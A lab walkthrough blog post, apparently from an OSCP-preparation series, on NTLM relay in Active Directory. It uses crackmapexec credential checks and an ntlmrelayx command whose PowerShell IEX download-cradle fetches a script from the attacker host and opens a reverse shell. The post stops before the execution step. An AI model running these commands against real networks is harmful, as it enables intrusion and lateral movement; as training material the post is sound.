Hi everyone,
So far so good, i hope that you 've read my lastest posts on reoadtoOSCP blog of Active Directory series[I],Active Directory series[II], Active Directory series[III].
I described the architecture, environment, responder attack and SMB Relay attack with dump hashes NTLM type, and you should understand the previous steps is very important to continue with this entry.
We are going to grow up to the next level !, this main goal and the most complex attack (of the day), because we want increase our penetrationtester leve on corporate domainsl!, It's defined and implemented in the following architecture design:
ATTACK DEVELOP STEP BY STEP:
1. In order to perform this attack successfully the powned user on the previous post Active Directory series[II] (CORPORATIVE\worker2), shall be logged on the WKS-002 machine.
2. The hacked user too, shall has administration privileges in local environment of WKS-001.
Validate the admin rigths:
crackmapexec smb 10.0.2.0/24 -u "worker2" -p "Passw0rd1"
SMB 10.0.2.15 445 WKS-001 [*] Windows 10.0 Build 16299 x64 (name:WKS-001) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)
SMB 10.0.2.16 445 WKS-002 [*] Windows 10.0 Build 19041 x64 (name:WKS-002) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)
SMB 10.0.2.17 445 CORPORATIVE-DOM [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)
SMB 10.0.2.15 445 WKS-001 [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1 (Pwn3d!)
SMB 10.0.2.16 445 WKS-002 [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1
SMB 10.0.2.17 445 CORPORATIVE-DOM [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1
Attack Process:
1. The worker2 user shall logged in WKS-002, and it will try to access to share resource (that not exist or is unavailable in this moment).
2. The attacker machine poisoned the response to this request and redirect it to perform smb authentication with ntlmrelayx that is worked on the local attacker machine service. This ntlmrealy, should make two actions:
2.1 Compromise smb authentication on WKS-002: 10.0.2.16
2.2 Send a command to WKS-001:10.0.2.15 with administrative privileges with worker2 user authentication.
sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -t 10.0.2.15 -c "powershell IEX(new-object net.webclient).DownloadString('http://10.0.2.19:8989/Invoke-PowerShellTcp.ps1')" -smb2support
This command exploit a RCE in order to compromise the WKS-001 machine using the WKS-002 such a brige with the domain user worker2, becouse it has adminitrative privileges over WKS-001.
3. The command order to the target machine 2 WKS-001 10.0.2.15 download and execute the powershell script Invoke-PowerShellTcp.ps1 (modified for invoke to the stored function on memory after of load it ) of the following http server, that is worked on attacker machine at port 8989:
root@kali:/home/kali# python3 -m http.server 8989
Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...
10.0.2.15 - - [13/Sep/2021 22:01:01] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
4. The target machine 2 WKS-001 load script and invoke it with IEX command provided on the section 2.2, with NT-Authority system privileges, this script spawn a reverse shell over tcp protocol to the attacker machine 10.0.2.19 at port 4545:
Attack execution:
On kali machine:
No comments:
Post a Comment